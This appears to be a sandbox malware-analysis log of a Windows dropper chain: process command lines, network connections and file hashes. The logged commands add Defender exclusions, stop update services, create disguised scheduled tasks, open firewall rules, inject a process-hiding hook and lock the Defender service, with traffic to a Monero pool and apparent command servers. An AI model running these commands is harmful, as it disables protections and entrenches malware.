C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vS3cv7Ny.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vS3cv7Ny.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\md5uC1Kk.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\md5uC1Kk.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\47E3.bat" "
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ig9ND9Br.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ig9ND9Br.exe
C:\Users\Admin\AppData\Local\Temp\493C.exe
C:\Users\Admin\AppData\Local\Temp\493C.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12119760436017153929,12975412688562994442,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5952 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\hW6pu6vt.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\hW6pu6vt.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12119760436017153929,12975412688562994442,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5936 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\4AF3.exe
C:\Users\Admin\AppData\Local\Temp\4AF3.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Ea32tu8.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Ea32tu8.exe
C:\Users\Admin\AppData\Local\Temp\4D84.exe
C:\Users\Admin\AppData\Local\Temp\4D84.exe
C:\Users\Admin\AppData\Local\Temp\4F3A.exe
C:\Users\Admin\AppData\Local\Temp\4F3A.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff912cc46f8,0x7ff912cc4708,0x7ff912cc4718
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 5836 -ip 5836
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5836 -s 796
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff912cc46f8,0x7ff912cc4708,0x7ff912cc4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff912cc46f8,0x7ff912cc4708,0x7ff912cc4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12119760436017153929,12975412688562994442,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4348 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12119760436017153929,12975412688562994442,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5444 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12119760436017153929,12975412688562994442,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6180 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12119760436017153929,12975412688562994442,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6572 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12119760436017153929,12975412688562994442,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6232 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12119760436017153929,12975412688562994442,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6224 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12119760436017153929,12975412688562994442,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6824 /prefetch:1
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2nO120ja.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2nO120ja.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3656 -ip 3656
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 540
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2196,12119760436017153929,12975412688562994442,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7284 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2196,12119760436017153929,12975412688562994442,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7284 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\8520.exe
C:\Users\Admin\AppData\Local\Temp\8520.exe
C:\Users\Admin\AppData\Local\Temp\8725.exe
C:\Users\Admin\AppData\Local\Temp\8725.exe
C:\Users\Admin\AppData\Local\Temp\88AC.exe
C:\Users\Admin\AppData\Local\Temp\88AC.exe
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Users\Admin\AppData\Local\Temp\kos4.exe
"C:\Users\Admin\AppData\Local\Temp\kos4.exe"
C:\Users\Admin\AppData\Local\Temp\latestX.exe
"C:\Users\Admin\AppData\Local\Temp\latestX.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2516 -ip 2516
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2516 -s 784
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
C:\Users\Admin\AppData\Local\Temp\is-IOMIP.tmp\LzmwAqmV.tmp
"C:\Users\Admin\AppData\Local\Temp\is-IOMIP.tmp\LzmwAqmV.tmp" /SL5="$F0090,6502186,54272,C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
C:\Users\Admin\AppData\Local\Temp\A4F0.exe
C:\Users\Admin\AppData\Local\Temp\A4F0.exe
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /F /TN "Z1026-1"
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Program Files (x86)\Drive Tools\zDriveTools.exe
"C:\Program Files (x86)\Drive Tools\zDriveTools.exe" -i
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Query
C:\Program Files (x86)\Drive Tools\zDriveTools.exe
"C:\Program Files (x86)\Drive Tools\zDriveTools.exe" -s
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1508 -ip 1508
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1508 -s 572
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Users\Admin\AppData\Local\Temp\1157.exe
C:\Users\Admin\AppData\Local\Temp\1157.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\windefender.exe
C:\Windows\windefender.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2196,12119760436017153929,12975412688562994442,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=8144 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 254.178.238.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.209.218.23.in-addr.arpa | udp |
| RU | 193.233.255.73:80 | 193.233.255.73 | tcp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.255.233.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| FI | 77.91.124.1:80 | 77.91.124.1 | tcp |
| US | 8.8.8.8:53 | 1.124.91.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.3.197.209.in-addr.arpa | udp |
| FI | 77.91.124.86:19084 | tcp | |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| NL | 142.250.179.141:443 | accounts.google.com | tcp |
| NL | 157.240.247.35:443 | www.facebook.com | tcp |
| NL | 157.240.247.35:443 | www.facebook.com | tcp |
| US | 8.8.8.8:53 | 14.36.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.179.250.142.in-addr.arpa | udp |
| NL | 142.250.179.141:443 | accounts.google.com | udp |
| US | 8.8.8.8:53 | 35.247.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | static.xx.fbcdn.net | udp |
| IE | 163.70.151.21:443 | static.xx.fbcdn.net | tcp |
| IE | 163.70.151.21:443 | static.xx.fbcdn.net | tcp |
| US | 8.8.8.8:53 | 21.151.70.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| DE | 172.217.23.214:443 | i.ytimg.com | tcp |
| US | 8.8.8.8:53 | 196.168.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 214.23.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.208.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | facebook.com | udp |
| IE | 163.70.151.35:443 | facebook.com | tcp |
| FI | 77.91.68.29:80 | 77.91.68.29 | tcp |
| US | 8.8.8.8:53 | fbcdn.net | udp |
| IE | 163.70.151.35:443 | fbcdn.net | tcp |
| US | 8.8.8.8:53 | fbsbx.com | udp |
| US | 8.8.8.8:53 | 35.151.70.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.68.91.77.in-addr.arpa | udp |
| RU | 193.233.255.73:80 | 193.233.255.73 | tcp |
| FI | 77.91.68.249:80 | 77.91.68.249 | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 249.68.91.77.in-addr.arpa | udp |
| RU | 5.42.65.80:80 | 5.42.65.80 | tcp |
| US | 8.8.8.8:53 | 80.65.42.5.in-addr.arpa | udp |
| FI | 77.91.124.86:19084 | tcp | |
| US | 8.8.8.8:53 | play.google.com | udp |
| FI | 77.91.124.86:19084 | tcp | |
| DE | 172.217.23.214:443 | i.ytimg.com | udp |
| FI | 77.91.68.29:80 | 77.91.68.29 | tcp |
| NL | 81.161.229.93:80 | 81.161.229.93 | tcp |
| US | 8.8.8.8:53 | 93.229.161.81.in-addr.arpa | udp |
| FI | 77.91.124.71:4341 | tcp | |
| US | 8.8.8.8:53 | 71.124.91.77.in-addr.arpa | udp |
| FI | 77.91.124.86:19084 | tcp | |
| US | 8.8.8.8:53 | iplogger.com | udp |
| DE | 148.251.234.93:443 | iplogger.com | tcp |
| US | 8.8.8.8:53 | stim.graspalace.com | udp |
| US | 188.114.97.0:80 | stim.graspalace.com | tcp |
| US | 8.8.8.8:53 | 93.234.251.148.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.97.114.188.in-addr.arpa | udp |
| BG | 171.22.28.213:80 | 171.22.28.213 | tcp |
| US | 8.8.8.8:53 | 213.28.22.171.in-addr.arpa | udp |
| FI | 77.91.124.86:19084 | tcp | |
| FI | 77.91.124.86:19084 | tcp | |
| FI | 77.91.124.1:80 | 77.91.124.1 | tcp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| FI | 77.91.124.86:19084 | tcp | |
| FI | 77.91.68.29:80 | 77.91.68.29 | tcp |
| FI | 77.91.124.86:19084 | tcp | |
| US | 8.8.8.8:53 | host-file-host6.com | udp |
| US | 8.8.8.8:53 | host-host-file8.com | udp |
| US | 95.214.26.28:80 | host-host-file8.com | tcp |
| US | 8.8.8.8:53 | 28.26.214.95.in-addr.arpa | udp |
| FI | 77.91.124.86:19084 | tcp | |
| FI | 77.91.124.86:19084 | tcp | |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| NL | 142.250.179.141:443 | accounts.google.com | udp |
| NL | 194.169.175.235:42691 | tcp | |
| US | 8.8.8.8:53 | 3665ca3d-3cc3-4552-b9f4-949b27dcf817.uuid.datadumpcloud.org | udp |
| US | 8.8.8.8:53 | 235.175.169.194.in-addr.arpa | udp |
| FI | 77.91.124.86:19084 | tcp | |
| FI | 77.91.124.86:19084 | tcp | |
| US | 8.8.8.8:53 | 9.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xmr-eu1.nanopool.org | udp |
| NL | 51.15.58.224:14433 | xmr-eu1.nanopool.org | tcp |
| US | 8.8.8.8:53 | stun2.l.google.com | udp |
| US | 8.8.8.8:53 | server13.datadumpcloud.org | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| IN | 172.253.121.127:19302 | stun2.l.google.com | udp |
| BG | 185.82.216.104:443 | server13.datadumpcloud.org | tcp |
| US | 8.8.8.8:53 | 233.130.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 127.121.253.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 224.58.15.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | walkinglate.com | udp |
| US | 188.114.96.0:443 | walkinglate.com | tcp |
| FI | 77.91.124.86:19084 | tcp | |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.67.143:443 | pastebin.com | tcp |
| DE | 51.68.190.80:14433 | xmr-eu1.nanopool.org | tcp |
| US | 8.8.8.8:53 | 104.216.82.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.96.114.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 143.67.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.190.68.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| NL | 142.250.179.194:443 | googleads.g.doubleclick.net | tcp |
| NL | 142.250.179.194:443 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | 194.179.250.142.in-addr.arpa | udp |
| BG | 185.82.216.104:443 | server13.datadumpcloud.org | tcp |
| FI | 77.91.124.86:19084 | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\mK1XA25.exe
| MD5 | 45c070db952b920b2564fb09653b050f |
| SHA1 | 95f02426bd86ecd8af5a5f7eaa947d9e739ea722 |
| SHA256 | 3f7aa7a0a753e93e66ee6d752e218777de63e3a40559bf6faabf5576fa0da3eb |
| SHA512 | 06579be6f6d7465e9533bedd12dcd1a44c538396c78a0f34abd9f73162a10359736e3e6a988b7736802d10fa7b9272579647df341bee5a1c3c70683d4ec5f464 |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\mK1XA25.exe
| MD5 | 45c070db952b920b2564fb09653b050f |
| SHA1 | 95f02426bd86ecd8af5a5f7eaa947d9e739ea722 |
| SHA256 | 3f7aa7a0a753e93e66ee6d752e218777de63e3a40559bf6faabf5576fa0da3eb |
| SHA512 | 06579be6f6d7465e9533bedd12dcd1a44c538396c78a0f34abd9f73162a10359736e3e6a988b7736802d10fa7b9272579647df341bee5a1c3c70683d4ec5f464 |
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ma9cL62.exe
| MD5 | 731804f286ac23b62c6951e391295dc3 |
| SHA1 | 8ce9a489bbe074442b0039b6e83e1b1010761c96 |
| SHA256 | 07b9a6f0b74d7083daab9dbd86faaa99341f5b7fe7f09c2bf00b4b0c1ca9d384 |
| SHA512 | 08e02ad30de3d3aa3de995262a338229f78d43f30a0b030dfa7b2bd592e70d5e91fbd082b765075366b79fdf2352a90c9e348531aa9095d0ad5a18849e04537c |
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ma9cL62.exe
| MD5 | 731804f286ac23b62c6951e391295dc3 |
| SHA1 | 8ce9a489bbe074442b0039b6e83e1b1010761c96 |
| SHA256 | 07b9a6f0b74d7083daab9dbd86faaa99341f5b7fe7f09c2bf00b4b0c1ca9d384 |
